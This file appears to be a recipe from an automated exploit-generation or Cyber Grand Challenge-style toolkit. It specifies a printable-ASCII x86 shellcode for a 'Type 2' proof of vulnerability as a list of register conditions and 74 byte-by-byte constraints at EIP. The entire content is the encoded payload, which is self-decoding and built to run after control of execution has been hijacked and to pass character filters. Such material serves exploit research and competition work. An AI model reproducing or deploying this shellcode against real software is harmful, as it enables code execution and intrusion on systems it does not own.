# ASCII shellcode recipe for T2 PoV
*type 2*
*skip = 0*
*EIP points to executable memory*
EDI[0] == EIP[0]
EDI[1] == EIP[1]
EDI[2] == EIP[2]
EDI[3] == EIP[3]
[EIP+0] == 0x57
[EIP+1] == 0x58
[EIP+2] == 0x2d
[EIP+3] == 0x3a
[EIP+4] == 0x55
[EIP+5] == 0x55
[EIP+6] == 0x55
[EIP+7] == 0x2d
[EIP+8] == 0x3b
[EIP+9] == 0x55
[EIP+10] == 0x55
[EIP+11] == 0x55
[EIP+12] == 0x2d
[EIP+13] == 0x3b
[EIP+14] == 0x55
[EIP+15] == 0x55
[EIP+16] == 0x55
[EIP+17] == 0x50
[EIP+18] == 0x5c
[EIP+19] == 0x6a
[EIP+20] == 0x65
[EIP+21] == 0x58
[EIP+22] == 0x34
[EIP+23] == 0x65
[EIP+24] == 0x50
[EIP+25] == 0x5e
[EIP+26] == 0x40
[EIP+27] == 0x50
[EIP+28] == 0x5b
[EIP+29] == 0x40
[EIP+30] == 0x50
[EIP+31] == 0x35
[EIP+32] == 0x58
[EIP+33] == 0x51
[EIP+34] == 0x73
[EIP+35] == 0x57
[EIP+36] == 0x35
[EIP+37] == 0x5a
[EIP+38] == 0x41
[EIP+39] == 0x73
[EIP+40] == 0x57
[EIP+41] == 0x50
[EIP+42] == 0x5a
[EIP+43] == 0x35
[EIP+44] == 0x50
[EIP+45] == 0x21
[EIP+46] == 0x6f
[EIP+47] == 0x77
[EIP+48] == 0x2d
[EIP+49] == 0x50
[EIP+50] == 0x71
[EIP+51] == 0x27
[EIP+52] == 0x34
[EIP+53] == 0x50
[EIP+54] == 0x59
[EIP+55] == 0x56
[EIP+56] == 0x58
[EIP+57] == 0x48
[EIP+58] == 0x35
[EIP+59] == 0x48
[EIP+60] == 0x35
[EIP+61] == 0x48
[EIP+62] == 0x35
[EIP+63] == 0x35
[EIP+64] == 0x7a
[EIP+65] == 0x4a
[EIP+66] == 0x7a
[EIP+67] == 0x4a
[EIP+68] == 0x50
[EIP+69] == 0x5f
[EIP+70] == 0x58
[EIP+71] == 0x57
[EIP+72] == 0x57
[EIP+73] == 0x57

